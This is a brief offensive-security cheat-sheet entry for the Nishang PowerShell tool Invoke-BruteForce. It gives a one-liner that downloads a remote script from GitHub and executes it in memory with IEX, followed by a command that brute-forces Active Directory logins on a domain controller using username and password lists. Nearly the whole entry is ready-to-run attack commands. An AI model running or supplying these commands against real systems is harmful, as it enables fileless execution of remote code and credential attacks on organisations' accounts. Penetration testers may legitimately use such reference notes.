Invoke-Bruteforce

Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Local Accounts, Web and FTP.

IEX(New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/raw/master/Scan/Invoke-BruteForce.ps1')
Invoke-BruteForce -ComputerName dc01.corp.com -UserList C:\Users\Joe\Downloads\samaccountnames.txt -PasswordList C:\Users\Joe\Downloads\passwords.txt -Service ActiveDirectory -Verbose

Last updated